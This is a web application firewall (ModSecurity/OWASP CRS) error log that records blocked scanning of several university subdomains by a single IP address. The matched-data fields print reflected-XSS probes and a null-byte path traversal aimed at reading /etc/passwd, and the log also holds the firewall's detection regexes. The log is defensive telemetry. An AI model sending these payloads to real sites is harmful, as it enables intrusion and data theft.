[Tue Aug 29 11:56:13.595363 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAolK0gAAAAe"]
[Tue Aug 29 11:56:13.608049 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAqY6TMAAAAr"]
[Tue Aug 29 11:56:13.610980 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAq@siEAAAAM"]
[Tue Aug 29 11:56:13.615665 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAolK0kAAAAe"]
[Tue Aug 29 11:56:13.627390 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16bcCo-f0AAAqY6TQAAAAr"]
[Tue Aug 29 11:56:14.926980 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/index.php"] [unique_id "ZO16bsCo-f0AAArC7iMAAAAW"]
[Tue Aug 29 11:56:14.976629 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16bsCo-f0AAArC7iQAAAAW"]
[Tue Aug 29 11:56:15.168940 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAocyfgAAAAR"]
[Tue Aug 29 11:56:15.169240 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAAolK04AAAAe"]
[Tue Aug 29 11:56:15.170386 2023] [:error] [pid 2651] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAApbUyUAAAAh"]
[Tue Aug 29 11:56:15.191339 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArB1zYAAAAV"]
[Tue Aug 29 11:56:15.191717 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAq@sigAAAAM"]
[Tue Aug 29 11:56:15.192066 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAApHRmMAAAAP"]
[Tue Aug 29 11:56:15.212242 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:uid: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16b8Co-f0AAAocyfoAAAAR"]
[Tue Aug 29 11:56:15.219698 2023] [:error] [pid 2631] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAApHRmQAAAAP"]
[Tue Aug 29 11:56:15.559565 2023] [:error] [pid 2647] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAApXgtsAAAAU"]
[Tue Aug 29 11:56:15.592119 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8cAAAAI"]
[Tue Aug 29 11:56:15.658693 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq3a8kAAAAI"]
[Tue Aug 29 11:56:15.660385 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/index.php"] [unique_id "ZO16b8Co-f0AAArC7ioAAAAW"]
[Tue Aug 29 11:56:15.677181 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ie50/system/login/SysLoginUser.aspx"] [unique_id "ZO16b8Co-f0AAAocyf8AAAAR"]
[Tue Aug 29 11:56:15.685243 2023] [:error] [pid 2745] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAq5@OgAAAAK"]
[Tue Aug 29 11:56:15.696434 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:aoid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:aoid: <script>alert(1)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php"] [unique_id "ZO16b8Co-f0AAAocygAAAAAR"]
[Tue Aug 29 11:56:16.777539 2023] [:error] [pid 2588] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:UID: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/system/login/SysLoginUser.aspx"] [unique_id "ZO16cMCo-f0AAAocygEAAAAR"]
[Tue Aug 29 11:56:16.780522 2023] [:error] [pid 2743] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:button. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9 found within ARGS:button: \\xe6\\x8f\\x90\\xe4\\xba\\xa4\\xe5\\x86\\x85\\xe5\\xae\\xb9"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/kindeditor/php/demo.php"] [unique_id "ZO16cMCo-f0AAAq3a8wAAAAI"]
